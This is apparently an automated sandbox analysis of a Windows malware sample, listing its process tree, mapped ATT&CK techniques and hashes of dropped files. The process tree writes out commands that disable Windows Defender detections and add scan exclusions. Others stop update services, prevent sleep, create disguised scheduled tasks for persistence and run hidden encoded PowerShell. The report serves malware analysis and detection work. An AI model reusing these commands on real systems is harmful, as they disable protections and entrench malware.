  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:4364
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3736
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:2020
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8424
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6832
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7444
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8280
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7728
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5736
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2004
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:892
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6864
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6580
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4440
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8704
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4772
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6940
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5840
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2708
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5640
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8424
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4240
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2104
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7044
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5996
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5364
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2340
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1224
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6888
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1224
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GdxvlpYGnipdDYEVdBR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GdxvlpYGnipdDYEVdBR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NVRHnqqYuoKU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NVRHnqqYuoKU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PxtQEfdrU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PxtQEfdrU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\anbFGpaSVIJEC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\anbFGpaSVIJEC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wbWGHgMzMEUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wbWGHgMzMEUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\GpoJrohhsQtRLIVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\GpoJrohhsQtRLIVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\YmqzWwwqxJQdhSTVN\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\YmqzWwwqxJQdhSTVN\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WVcQpKJMvymSgqJu\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WVcQpKJMvymSgqJu\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:8864

C:\Users\Admin\Desktop\a\newmar.exe
C:\Users\Admin\Desktop\a\newmar.exe
1⤵
PID:8408

C:\ProgramData\presepuesto\LEAJ.exe
C:\ProgramData\presepuesto\LEAJ.exe
1⤵
PID:8500

C:\Users\Admin\Desktop\a\newmar.exe
C:\Users\Admin\Desktop\a\newmar.exe
1⤵
PID:8276

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:6364

C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
1⤵
PID:1084

C:\Users\Admin\Desktop\a\newmar.exe
C:\Users\Admin\Desktop\a\newmar.exe
1⤵
PID:7836

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:7532
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:8904
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:1192
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:6036
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:8440
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:7652

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:8812

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
1⤵
PID:2172

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /delete /f /tn "WindowsAutHost"
1⤵
PID:9164

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:5200
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:8912
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:5820
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:5616
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:4108

C:\Users\Admin\Desktop\a\newmar.exe
C:\Users\Admin\Desktop\a\newmar.exe
1⤵
PID:8428

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /tn "WindowsAutHost" /xml "C:\Users\Admin\AppData\Local\Temp\vdsysklwvhji.xml"
1⤵
- Creates scheduled task(s)
PID:4820

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "WindowsAutHost"
1⤵
PID:7044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:8776

C:\Users\Admin\AppData\Roaming\WindowsServices\WindowsAutHost
C:\Users\Admin\AppData\Roaming\WindowsServices\WindowsAutHost
1⤵
PID:7448

C:\Users\Admin\Desktop\a\newmar.exe
C:\Users\Admin\Desktop\a\newmar.exe
1⤵
PID:4344

C:\ProgramData\presepuesto\LEAJ.exe
C:\ProgramData\presepuesto\LEAJ.exe
1⤵
PID:4192

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5816

C:\Users\Admin\Desktop\a\newmar.exe
C:\Users\Admin\Desktop\a\newmar.exe
1⤵
PID:8784

C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
1⤵
PID:4760

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}
1⤵
PID:7328

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:9004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4784

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:7716
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 4F69B27F1B7A80A0AC7063647B9E6984 C
  2⤵
  PID:5972

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:7424
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:4708
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:8916
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:5836

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
1⤵
PID:4820

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:7496
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:5620

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:5896

C:\Windows\system32\WerFault.exe
"C:\Windows\system32\WerFault.exe" -k -lc PoW32kWatchdog PoW32kWatchdog-20231118-1629.dm
1⤵
PID:8840

C:\Users\Admin\Desktop\a\newmar.exe
C:\Users\Admin\Desktop\a\newmar.exe
1⤵
PID:3956

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Chrome\CNSWA.exe

Filesize
21.6MB

MD5
0b259acb7917ad0c9b0da449b93b8bdd

SHA1
a5412d45b7775f77c16df7d13d70453754c8e1f0

SHA256
114c9cef92927e80d7184cf4a6b034da799867aa7e6de38b9a1811181eeb4677

SHA512
aa58301b450e8300742c4a5a9b14b8f02a16d8f222c432f09ab94726230b6312e759c4f4ff8a25fcf5d69c4ee9072606a1af4caf3f224a32096b6eb6cb9cf965

Download Submit
C:\ProgramData\presepuesto\LEAJ.exe

Filesize
6.2MB

MD5
ab470dd42f581145478a79e4891b66ac

SHA1
23a1dc67cb9256403eb01ce469277969416878f5

SHA256
99326f7f1bbeba49536083cf460cc8ca004c1c0ef9e156b806be0c5c59f7ddd5

SHA512
27afd14aada2a12bf5f162da31ed2fcdc8e47492d82f99ea7610e231cd742eae5fa7514b1fba3d4fe1e3936f1c7613c3881f6e83d98d6e48b00433c328a41a14

Download Submit
C:\Users\Admin\AppData\Local\6HT3AdkErCrW7e6wRfTZxRCf.exe

Filesize
4.2MB

MD5
d373ff7cb6ac28b844d9c90fc8f1ab3f

SHA1
8bd2bd07e929d71f5c27ba7fab3777f29a4c48e3

SHA256
92a53acf35b82eaf96286b8a5dab6cef0513c48dff9e480fa3486033258c093b

SHA512
f89fce3365f1a9091b2523ea310089c53d67469e1d75b1e842eff2d59eb2a42fbbb49f03f3a45f9e56734895add9ac865e9adc1dbc0dfc4b34314b48bb0871a1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
aa3db8cebbba0c7fa0cc0b759d4eaa09

SHA1
5412d2b31c0af2e3792102b41cbc7e2e458229c2

SHA256
31e60a03e3a6d25648c849f58b1711ddc3f7144ab3cb49d27f6fe322536b8023

SHA512
c04a3629acbfd8a2a3b9dad2fff428e8450a65c3a2fe35e775f4e0713794e82cfb00e8e01725bf6b2e1f7ac79811965c32680eb7f6debdd31a795177a82cc8de

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
aa3db8cebbba0c7fa0cc0b759d4eaa09

SHA1
5412d2b31c0af2e3792102b41cbc7e2e458229c2

SHA256
31e60a03e3a6d25648c849f58b1711ddc3f7144ab3cb49d27f6fe322536b8023

SHA512
c04a3629acbfd8a2a3b9dad2fff428e8450a65c3a2fe35e775f4e0713794e82cfb00e8e01725bf6b2e1f7ac79811965c32680eb7f6debdd31a795177a82cc8de

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
336B

MD5
ed93b546779b8895fdc565a50d71183c

SHA1
d25963465c07b67dd691ea4b1964ee7e1e2edac9

SHA256
6968b995fef9c02baa0cdc100ad2b6d863cf590479a37d7b2148cb12421fe04d

SHA512
fdf3a2d2ede13b25db7c724c7cef1ee66dea9ee5038a3d10d45692192fdc03d9bc79dcb698343a53c3a2bbfeb4925a37549829ed98b4bb46ba5a170303a241ef

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
336B

MD5
ed93b546779b8895fdc565a50d71183c

SHA1
d25963465c07b67dd691ea4b1964ee7e1e2edac9

SHA256
6968b995fef9c02baa0cdc100ad2b6d863cf590479a37d7b2148cb12421fe04d

SHA512
fdf3a2d2ede13b25db7c724c7cef1ee66dea9ee5038a3d10d45692192fdc03d9bc79dcb698343a53c3a2bbfeb4925a37549829ed98b4bb46ba5a170303a241ef

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
432B

MD5
f13b37a493b22dd8b4f8738bfc70b89a

SHA1
217e208bde71bdb5a2d5f4bf14adff7f68c5f588

SHA256
4351aab6da9e18a841580038b570f8689c6a58553bab1be84f241d4ad61a7364

SHA512
7c23b2540d74286a7e94a26488f8b23ef5ecd418e291239b0b9596856b94864b2cef5cd40b49bcaee03bbac8fe29344c0c7c1b183d3146504750fc782846e968

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

Filesize
264KB

MD5
d845ea951d4335f9569daf3cdd430d3b

SHA1
9bff5e4e345570dcca0dd03c1708de31d2dacd56

SHA256
c2ee1ba6bebf7ea0a3f63eeeaed3eeb74e4245d4709cc26f7b216e9117016776

SHA512
c80109d0687fe914edad6b4febc6785cc52d99aaa7f3f4208f2803f2a041e1fa1a577ac1ce3101a051faf668647f511aacf7d12c8272a0a9b3dde1a47233ba87

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG

Filesize
320B

MD5
57207369084385415071dd4e4390f262

SHA1
56f3a25542bd41e654d5f5528a1ceeb5d5b01246

SHA256
a8e2d2c7e668564c32fa0e11c2c5576c7ffc832ca8ebd672aca7ef7741b932ad

SHA512
08f0adbe2aa37b39f1b8731ca041784134cb5ae74b4489b3727f75de6a47311ba14397c419d29abee39fcc3c9a424579c00a7f55f50aca48c964b3db4b98d20b

Download Submit
